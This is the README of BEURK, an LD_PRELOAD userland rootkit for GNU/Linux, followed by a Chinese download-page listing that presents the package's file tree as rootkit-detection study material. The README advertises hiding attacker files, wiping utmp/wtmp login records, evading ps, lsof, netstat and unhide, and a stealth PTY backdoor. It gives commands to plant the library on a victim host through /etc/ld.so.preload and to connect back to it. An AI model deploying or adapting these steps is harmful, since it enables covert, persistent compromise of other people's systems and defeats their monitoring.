BEURK
=====
[Getting Started] | [API Documentation] | [Contributing] | [TODO List]
[![Travis Build][Travis badge]](https://travis-ci.org/unix-thrust/beurk)
[![Ready Issues][Waffle badge]](https://waffle.io/unix-thrust/beurk)
[![Coverage Status][Cover badge]](https://coveralls.io/r/unix-thrust/beurk)
[![Jenkins Build][Jenkins badge]](http://ci.zgun-family.eu/job/BEURK/)
[![Join the chat at https://gitter.im/unix-thrust/beurk](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/unix-thrust/beurk)
**BEURK** is an userland [preload rootkit] for GNU/Linux, heavily focused
around anti-debugging and anti-detection.
> _**S'ils savaient, ils vomiraient ...**_
>
> *- The core team -*
-------------------------------------------------------------------------------
### Features ###
- Hide attacker files and directories
- Realtime log cleanup (on [utmp/wtmp])
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
### Upcoming features ###
- [ptrace(2)] hooking for anti-debugging
- [libpcap] hooking undermines local sniffers
- PAM backdoor for *local privilege escalation*
### Usage ###
* **Compile**
```sh
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
```
* **Install**
```sh
scp libselinux.so [email protected]:/lib/
ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'
```
* **Enjoy !**
```sh
./client.py victim_ip:port # connect with furtive backdoor
```
### Dependencies ###
The following packages are not required in order to build BEURK at the moment:
* **libpcap** - to avoid local sniffing
* **libpam** - for local PAM backdoor
* **libssl** - for encrypted backdoor connection
**Example on debian:**
```sh
apt-get install libpcap-dev libpam-dev libssl-dev
```
-------------------------------------------------------------------------------
[![Waffle metrics][Waffle metrics]](https://waffle.io/unix-thrust/beurk/metrics)
* _**BEURK v 1.0 is in active development,**_
_**please checkout current [development branch].**_
> NOTE: **BEURK** is a recursive acronym for
> **B**EURK **E**xperimental **U**nix **R**oot **K**it
-------------------------------------------------------------------------------
[Getting Started]: https://github.com/unix-thrust/beurk/wiki
[API Documentation]: https://github.com/unix-thrust/beurk/wiki/API-Documentation
[TODO List]: https://github.com/unix-thrust/beurk/blob/master/TODO.md
[Contributing]: https://github.com/unix-thrust/beurk/blob/master/CONTRIBUTING.md
[Travis badge]: https://travis-ci.org/unix-thrust/beurk.svg?branch=master
[Waffle badge]: https://badge.waffle.io/unix-thrust/beurk.svg?label=Ready&title=Ready-Issues
[Cover badge]: https://img.shields.io/coveralls/unix-thrust/beurk.svg
[Jenkins badge]: http://ci.zgun-family.eu/job/BEURK/badge/icon
[Waffle metrics]: https://graphs.waffle.io/unix-thrust/beurk/throughput.svg
[preload rootkit]: http://volatility-labs.blogspot.fr/2012/09/movp-24-analyzing-jynx-rootkit-and.html
[utmp/wtmp]: http://man7.org/linux/man-pages/man5/utmp.5.html
[ptrace(2)]: http://man7.org/linux/man-pages/man2/ptrace.2.html
[libpcap]: http://en.wikipedia.org/wiki/Pcap#libpcap
[development branch]: https://github.com/unix-thrust/beurk/tree/dev
没有合适的资源?快使用搜索试试~ 我知道了~
wazuh安装、Rootkit原理解析与检测实践
共104个文件
c:47个
sh:18个
h:7个
1 下载量 27 浏览量
2023-08-20
09:23:40
上传
评论
收藏 86KB ZIP 举报
温馨提示
wazuh安装、Rootkit原理解析与检测实践
资源推荐
资源详情
资源评论
收起资源包目录
wazuh安装、Rootkit原理解析与检测实践 (104个子文件)
drop_shell_backdoor.c 7KB
init.c 3KB
debug.c 3KB
is_hidden_file.c 2KB
cleanup_login_records.c 2KB
hide_tcp_ports.c 2KB
open.c 2KB
hide_tcp_ports.c 2KB
is_attacker.c 1KB
readdir64.c 1KB
fopen64.c 1KB
fopen.c 1KB
__xstat64.c 1KB
__xstat.c 1KB
readdir.c 1KB
__lxstat64.c 1KB
__lxstat.c 1KB
is_procnet.c 1KB
stat64.c 1KB
accept.c 1KB
unlinkat.c 1KB
lstat64.c 1KB
stat.c 1KB
link.c 1KB
lstat.c 1KB
open.c 1KB
access.c 1KB
unlink.c 1KB
rmdir.c 1KB
is_hidden_file.c 982B
drop_shell_backdoor.c 975B
main.c 882B
is_procnet.c 521B
is_attacker.c 397B
accept.c 392B
open.c 334B
cleanup_login_records.c 193B
lstat.c 131B
stat.c 130B
readdir.c 126B
test.c 113B
unlinkat.c 68B
fopen.c 67B
link.c 64B
access.c 63B
unlink.c 59B
rmdir.c 59B
commit-msg 58B
beurk.conf 2KB
Makefile.dep 3KB
.gitignore 104B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitmodules 93B
config.h 4KB
hooks.h 2KB
hooks.h 2KB
beurk.h 2KB
beurk.h 1KB
debug.h 1KB
tests.h 699B
LICENSE 34KB
Makefile 4KB
Makefile 739B
README.md 3KB
README.md 1KB
CONTRIBUTING.md 1KB
TODO.md 900B
README.md 197B
run.py 5KB
client.py 4KB
commit-msg.py 4KB
coverage.py 2KB
internal_hooks_calls.py 2KB
check_gplv3_headers.py 1KB
reconfigure 11KB
run.sh 2KB
run-tests.sh 1KB
run.sh 1KB
run.sh 1KB
makefile.sh 1KB
client.sh 1KB
jenkins-tests.sh 542B
check_commits_history.sh 376B
deploy_git_hooks.sh 176B
socat-client.sh 162B
lsof.sh 0B
ps.sh 0B
ldd.sh 0B
lynis.sh 0B
rkhunter.sh 0B
ossec.sh 0B
chkrootkit.sh 0B
tiger.sh 0B
utmp.test 175B
files.test 153B
proc-net-tcp-with-hidden_port.txt 873B
共 104 条
- 1
- 2
资源评论
沐芊屿
- 粉丝: 78
- 资源: 1
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功